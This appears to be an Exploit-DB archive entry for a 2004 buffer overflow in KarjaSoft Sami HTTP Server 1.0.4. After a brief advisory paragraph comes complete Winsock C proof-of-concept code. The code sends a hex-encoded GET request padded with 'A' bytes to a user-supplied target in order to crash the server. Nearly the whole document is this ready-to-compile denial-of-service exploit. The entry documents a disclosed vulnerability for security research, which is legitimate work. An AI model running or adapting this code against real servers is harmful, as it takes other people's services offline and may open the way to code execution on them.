KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow

EDB-ID:

23714


Author:

badpack3t

Type:

remote


Platform:

Windows

Date:

2004-02-13


// source: https://www.securityfocus.com/bid/9679/info

A vulnerability has been reported for Sami HTTP server. The problem occurs due to insufficient bounds checking when handling GET requests.

As a result, an attacker may be capable of corrupting sensitive data such as a return address, and thereby effectively control the execution flow of the program. This would ultimately allow for the execution of arbitrary code. Immediate consequences of exploitation of this issue may result in denial of service.

/****************************/
   PoC to crash the server
/****************************/

http://fux0r.phathookups.com/coding/c++/sp-samihttpddos.c

/* Sami HTTP Server Version 1.0.4
   vendor:
   http://karja.com

   coded and discovered by:
   badpack3t <badpack3t@security-protocols.com>
   for .:sp research labs:.
   www.security-protocols.com
   2.13.2004

   usage:
   sp-samihttpddos <targetip> [targetport] (default is 80)
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

/* entire request */
"\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e"
"\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52"
"\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c"
"\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a"
"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70"
"\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d"
"\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d"
"\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65"
"\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67"
"\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37"
"\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20"
"\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36"
"\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72"
"\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63"
"\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63"
"\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20"
"\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c"
"\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61"
"\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f"
"\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f"
"\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65"
"\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d"
"\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a"
"\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f"
"\x0d\x0a";

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in      sock;
        char *target;
        int port,bufsize;
        SOCKET mysocket;

        if (argc < 2)
        {
                printf("Sami HTTP Server Version 1.0.4 DoS by badpack3t\r\n <badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
                printf("Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
                printf("www.security-protocols.com\r\n\r\n", argv[0]);
                exit(1);
        }

        wVersionRequested = MAKEWORD(1, 1);
        if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

        target = argv[1];
        port = 80;

        if (argc >= 3) port = atoi(argv[2]);
        bufsize = 1024;
        if (argc >= 4) bufsize = atoi(argv[3]);

        mysocket = socket(AF_INET, SOCK_STREAM, 0);
        if(mysocket==INVALID_SOCKET)
        {
                printf("Socket error!\r\n");
                exit(1);
        }

        printf("Resolving Hostnames...\n");
        if ((pTarget = gethostbyname(target)) == NULL)
        {
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }

        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons((USHORT)port);

        printf("Connecting...\n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
        {
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        printf("Sending Payload...\n");
        if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
        {
                printf("Error Sending the Exploit Payload\r\n");
                closesocket(mysocket);
                exit(1);
        }

        printf("Payload has been sent! Check if the webserver is dead y0!\r\n");
        closesocket(mysocket);
        WSACleanup();
        return 0;
}